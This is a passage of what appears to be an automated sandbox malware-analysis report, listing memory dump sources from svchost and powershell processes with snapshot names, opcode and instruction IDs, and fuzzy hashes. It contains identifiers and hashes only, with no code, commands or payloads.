                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 02540506b0ba2ec298a880c9186c9204d887efa5c3af5416e75ae2c67ee7d28e
                                                                    • Instruction ID: 541e30050e8c1eea11064c68d94758b0546129260376e597b48f8e6d03887da5
                                                                    • Opcode Fuzzy Hash: 02540506b0ba2ec298a880c9186c9204d887efa5c3af5416e75ae2c67ee7d28e
                                                                    • Instruction Fuzzy Hash: B221ADA0E9964E5FD344EB2C98B55B9BF71EF98300B8084A9D40AC3386DF34B910C792
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.1604819172.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9e8cbea2d21083a8a09577fe551329648cb889e7c2ea2787ee1327ff4bbdc7f6
                                                                    • Instruction ID: 2b080ff8c42c1c11502859321e796925a978dc1485f44f26e95c24ca8620a9fd
                                                                    • Opcode Fuzzy Hash: 9e8cbea2d21083a8a09577fe551329648cb889e7c2ea2787ee1327ff4bbdc7f6
                                                                    • Instruction Fuzzy Hash: 83014E55D0D6C10FE751BB385865175BFE0DF91220B8804AAD988C72E7DD08F94583D3
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675918587.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5de96bc53ec456e857de6abbd89c7f416eeb3f629791d03b2c6e508604bf380d
                                                                    • Instruction ID: dbfeb5cde40137fb8b9a7683d6ff184c860a8e154740c744467af3a110549771
                                                                    • Opcode Fuzzy Hash: 5de96bc53ec456e857de6abbd89c7f416eeb3f629791d03b2c6e508604bf380d
                                                                    • Instruction Fuzzy Hash: A1D1487190DA898FEB55AF3888155B9BBA4FF06364B4801FEE04DC72D3DA18BC15C3A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675182025.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 321e73b9e10a840e9ae84abd2355c57e8f0bd8567b76c1ddac83dcfaf91e3e86
                                                                    • Instruction ID: 6a7fd0f13fb0de70ce98b27be23949319df0f9547437b609cf55105281ae3441
                                                                    • Opcode Fuzzy Hash: 321e73b9e10a840e9ae84abd2355c57e8f0bd8567b76c1ddac83dcfaf91e3e86
                                                                    • Instruction Fuzzy Hash: B031C87191CB489FDB589F5CA8066F9BBE1FB99710F40422FE449D3252DB70B8158BC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1674695375.00007FF7C0BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0BBD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0bbd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f3af6e7c26f32c96e57d9a63c868d176669688f59950cc418ce2e070adb95832
                                                                    • Instruction ID: e4be5ae6e69387b8087661166a82fccabd1b0c7e898d2a05d4b32243fb2ecbd6
                                                                    • Opcode Fuzzy Hash: f3af6e7c26f32c96e57d9a63c868d176669688f59950cc418ce2e070adb95832
                                                                    • Instruction Fuzzy Hash: 6241017080DBC44FE756DF2898459527FF0EF52320B1505EFE489CB2A3D629B84AC7A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675182025.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 74097fd03e31982686b08d060ca3b28addda2288284c63068351802987ba7558
                                                                    • Instruction ID: 75542b8b81f418cd374a8bda399806f18728895604eeffb74aa4f50f4e3f08b8
                                                                    • Opcode Fuzzy Hash: 74097fd03e31982686b08d060ca3b28addda2288284c63068351802987ba7558
                                                                    • Instruction Fuzzy Hash: 1921D83190CB4C8FDB59DFAC984A7E97BF0EB96321F04416BD049C3152DA74A45ACB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675182025.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction ID: 4f9f3889a377c08dcfde1f69c3270b95b9375c8996e9aaf60aacf75038a288f1
                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction Fuzzy Hash: 9D01677115CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661DB36E882CB46
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675918587.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7126c61c63f6074ca8ff10e064bcc06920929d28276a0acfcb2cab97d9fbcf0
                                                                    • Instruction ID: b178c23586c089b96115840118055f23efb5967013fe18c1d9ab995b94dc7bb5
                                                                    • Opcode Fuzzy Hash: b7126c61c63f6074ca8ff10e064bcc06920929d28276a0acfcb2cab97d9fbcf0
                                                                    • Instruction Fuzzy Hash: BFF0BE32A0CA088FD698EB0CE4004A8B3E0FF9433175100BAE05DC77A7CB25FC948790
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675918587.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c560b9c9e5f9e65303bbe37a3766d12504f5c13f96c261c886edf4c5a1fbb27
                                                                    • Instruction ID: 656d7539aed1ac49c4f683dab07f59281c069acfc01c8d11d2dc9dae0f32d3cd
                                                                    • Opcode Fuzzy Hash: 6c560b9c9e5f9e65303bbe37a3766d12504f5c13f96c261c886edf4c5a1fbb27
                                                                    • Instruction Fuzzy Hash: 3DF0BE31A0C6488FD754EB0CE4405A8B3E0FF8832178100B6E059C7693CB69BC5487A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675918587.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction ID: 2cda973fc30cbc659bbd4915eadeb9b986d903964666e6c6965fdc1df9e9fcf1
                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction Fuzzy Hash: 90E0123170C5048FD6A8EF0CE0409A9B3E1EB9833175101B7D14EC7661C721FC918BD0
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675182025.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05c13cbc7836436d9360719029455e2d70194ab4226e9800c4b562ef5b58bea7
                                                                    • Instruction ID: edb303bdfa044daadf3719b115c1a6f625758f19ce62950c12aeeba1391f3e8f
                                                                    • Opcode Fuzzy Hash: 05c13cbc7836436d9360719029455e2d70194ab4226e9800c4b562ef5b58bea7
                                                                    • Instruction Fuzzy Hash: 5DE04F31914A4C8FCB45EF18D8199E97BA0FB69305F01029BA80DC7161DB30AA58CBC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1675182025.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^4$M_^7$M_^F$M_^J
                                                                    • API String ID: 0-622050427
                                                                    • Opcode ID: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                                    • Instruction ID: b12b489fb68b6187f41998490a947116b5a51fabe916167fddc1b5390a466593
                                                                    • Opcode Fuzzy Hash: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                                    • Instruction Fuzzy Hash: D92126B76085658FD3027B7DBC05AE93784CFA43B478543B2E198CB183FE1470968AD4
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1804086232.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e67da30f1eefd534ad859ab723d643b897ce38d51c27514e60b53c309ad2771
                                                                    • Instruction ID: 273cf5c124eca316c95ce7885724b263ce6b0bcc893197c93ced3aadbb36435d
                                                                    • Opcode Fuzzy Hash: 5e67da30f1eefd534ad859ab723d643b897ce38d51c27514e60b53c309ad2771
                                                                    • Instruction Fuzzy Hash: F5D1373191DA898FE755AF3888155B9BBA5FF06364B4801FEE04DC72D3DA28BC15C3A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1803256249.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aa03c9463b5913c81b37739082760b68653aa676a39c2e65e134d433123271a2
                                                                    • Instruction ID: 7e642bdf7a3a51c373a7aa36e2fdf3ee12989c82e45031baac46c376e84e9bc3
                                                                    • Opcode Fuzzy Hash: aa03c9463b5913c81b37739082760b68653aa676a39c2e65e134d433123271a2
                                                                    • Instruction Fuzzy Hash: 6051F67190DB885FD7199B689C0A6A9BFE0FF56310F0441AFD089C3293CB64B859C7D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1802520688.00007FF7C0BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0BBD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0bbd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d517fdffeaf3936b480db0e9f93c3194fb4c06e3b9d8808945cb52543a99492a
                                                                    • Instruction ID: f5fbb02fdce9088fed5cfcd55dab86592a3bcea709374d29521ad0c9d287962a
                                                                    • Opcode Fuzzy Hash: d517fdffeaf3936b480db0e9f93c3194fb4c06e3b9d8808945cb52543a99492a
                                                                    • Instruction Fuzzy Hash: 2B41263040DBC44FD7569F299C459523FB0EF56320B1502EFE489CB2A3D629A84AC7A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1803256249.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ffc86cbd05c81bf1e7240f13df9aaa1ec477de6d94409b4378ca654d8477209b
                                                                    • Instruction ID: a930b78a1d138747631921da76c8fd5bbaad7a2739628c2f687d9f28e970974c
                                                                    • Opcode Fuzzy Hash: ffc86cbd05c81bf1e7240f13df9aaa1ec477de6d94409b4378ca654d8477209b
                                                                    • Instruction Fuzzy Hash: 9F21057190CB4C4FDB58DF5C984A6E97BF0EF9A320F04416FD048C7252DA74A40ACB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1803256249.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f0bca4a2bf712f308d193225c910685bbf402ba1b29f5aaf3c27371149c38ff0
                                                                    • Instruction ID: c5f732658834d20c7f15bec782b730edf04532e330e800fe022a1968edbaae78
                                                                    • Opcode Fuzzy Hash: f0bca4a2bf712f308d193225c910685bbf402ba1b29f5aaf3c27371149c38ff0
                                                                    • Instruction Fuzzy Hash: B901D8A290D78D5FD702AB38AC357E57FA0EF63218F0902E7D589CB1A3D6185818C392
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1803256249.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction ID: 4f9f3889a377c08dcfde1f69c3270b95b9375c8996e9aaf60aacf75038a288f1
                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction Fuzzy Hash: 9D01677115CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661DB36E882CB46
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1804086232.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 64deb0c77d11845eec7416d412ecc8e9cde390c8af27e2647b2b19ccf0c95276
                                                                    • Instruction ID: e8b41b98a31ef8c8757a507f638b59c70e06a09a1193fee68fab2a9a14fbc636
                                                                    • Opcode Fuzzy Hash: 64deb0c77d11845eec7416d412ecc8e9cde390c8af27e2647b2b19ccf0c95276
                                                                    • Instruction Fuzzy Hash: 3CF0BE32A0C6088FD698EB0CE4004A8B3E0FF9433175500BAE05DC76A7CB25FC90C791
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1804086232.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6a6dd76d3be87a67d048fd824a29851edf069df4e886e779d189eb6509c2890c
                                                                    • Instruction ID: 339b4e574624027e319547f108c1a13ec1d02d36578fb02eddd587758bc85dca
                                                                    • Opcode Fuzzy Hash: 6a6dd76d3be87a67d048fd824a29851edf069df4e886e779d189eb6509c2890c
                                                                    • Instruction Fuzzy Hash: 47F0BE31A0C6488FD754EB0CE4405A8B3E0FF8832178500B6E049C7653CB69BC50C7A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1804086232.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction ID: 2cda973fc30cbc659bbd4915eadeb9b986d903964666e6c6965fdc1df9e9fcf1
                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction Fuzzy Hash: 90E0123170C5048FD6A8EF0CE0409A9B3E1EB9833175101B7D14EC7661C721FC918BD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1803256249.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                    • API String ID: 0-962139525
                                                                    • Opcode ID: 64d54649c1b082f21b48bcec0ea01dd949fe03042b20aeedb8b22134a012397b
                                                                    • Instruction ID: 94d4d80137daeca04db296451db6b4fc8de33b7b69e9b88188f85f441acbe872
                                                                    • Opcode Fuzzy Hash: 64d54649c1b082f21b48bcec0ea01dd949fe03042b20aeedb8b22134a012397b
                                                                    • Instruction Fuzzy Hash: 2621C5B36145158BD201366CBC42AD877C4DF643B938643F3E128CF253EA18749B8A85
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db2a96119584750e9104375963ad490beaff905d599d26285b8ef761d6306184
                                                                    • Instruction ID: c633d7ee07f099d994e304d6a63666710ed4fb10966cab25ef031cde8daeb4c5
                                                                    • Opcode Fuzzy Hash: db2a96119584750e9104375963ad490beaff905d599d26285b8ef761d6306184
                                                                    • Instruction Fuzzy Hash: C6229870E28A594FE798FB2844696B9B7D2FF88750F94457DD40EC33D2DE28B8418782
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50478f629f32df04c78cced5c6cc5202a9c4e3acc28eeafc84f7a635aadcf8f1
                                                                    • Instruction ID: a8406d2aa1f78e13aa88a4feb224bfc70e63fdccadc62427859985bda81a4c3d
                                                                    • Opcode Fuzzy Hash: 50478f629f32df04c78cced5c6cc5202a9c4e3acc28eeafc84f7a635aadcf8f1
                                                                    • Instruction Fuzzy Hash: 21513320A1DAC94FD796AB7C58342B9BFD5DF47265B0801FAE0C9C7293DE186C06C396
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 9L_^
                                                                    • API String ID: 0-1679237627
                                                                    • Opcode ID: 45ed4724ab7d60c6b2b10f2ec5a182f222c71128a21a8a3c9c9a4f2c548b24a5
                                                                    • Instruction ID: ba433d8c00c6e9ddaff7117c705d7e58adaca2e4218acc2ce851983efef73abc
                                                                    • Opcode Fuzzy Hash: 45ed4724ab7d60c6b2b10f2ec5a182f222c71128a21a8a3c9c9a4f2c548b24a5
                                                                    • Instruction Fuzzy Hash: 3C613675A0891A4FE701BBBCA8522FC77A0EF85365B94857AD10CC7393CF28B48687D5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4L_^
                                                                    • API String ID: 0-2524838182
                                                                    • Opcode ID: 211f06a8f9065acd6e948936422e6db4bbd347cc4e6203a1961a9fff3b7aeaac
                                                                    • Instruction ID: 890415eb19d2ac226e18b1a7dfe2b3c57587a68f2d7ce256b53e8ae9420ec0ff
                                                                    • Opcode Fuzzy Hash: 211f06a8f9065acd6e948936422e6db4bbd347cc4e6203a1961a9fff3b7aeaac
                                                                    • Instruction Fuzzy Hash: C8511821A1DA860FE366A77C58662F57FE1DF86270B4941FBD08DC7293DD1CAC428362
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a9c4bf1780f5bdacacbed6b4c9b135cce8a6668a6d7bcab87cb03b5470ffc4fb
                                                                    • Instruction ID: ef8ab6ea2ecc05ff09e2ea78f087e9d65e4bf2cdbb753299b2e52407e80d49ac
                                                                    • Opcode Fuzzy Hash: a9c4bf1780f5bdacacbed6b4c9b135cce8a6668a6d7bcab87cb03b5470ffc4fb
                                                                    • Instruction Fuzzy Hash: 30210732A086554FD701FB7CE8622E9BBA0FF82365B444677C089DB293DF28741687D5
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f0d371eac3bfcd35ff04763b0faea21968d83a7087ce34df1deb3ff2ae4b0b1f
                                                                    • Instruction ID: ab002e40d03df4088d62d00c7f82b8109f134a8737e25c7dceae3719e08eb075
                                                                    • Opcode Fuzzy Hash: f0d371eac3bfcd35ff04763b0faea21968d83a7087ce34df1deb3ff2ae4b0b1f
                                                                    • Instruction Fuzzy Hash: B4A13576B08A164FD701BB7CB8562F97BA0EF863B1B544577C148CB293CA24B09AC7D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aff140db947f641a48f2773ff48654bad6a834118dcc3210f34a892f2737b34c
                                                                    • Instruction ID: b512678ac84bcd776de97c89855cdfef48dcd59e115de191981d42d50b318ecd
                                                                    • Opcode Fuzzy Hash: aff140db947f641a48f2773ff48654bad6a834118dcc3210f34a892f2737b34c
                                                                    • Instruction Fuzzy Hash: E5914566B0891A4BD701BB7CB8562FD7BA0EF853B1B948577C148CB293CA24B097C7D1
                                                                    Memory Dump Source
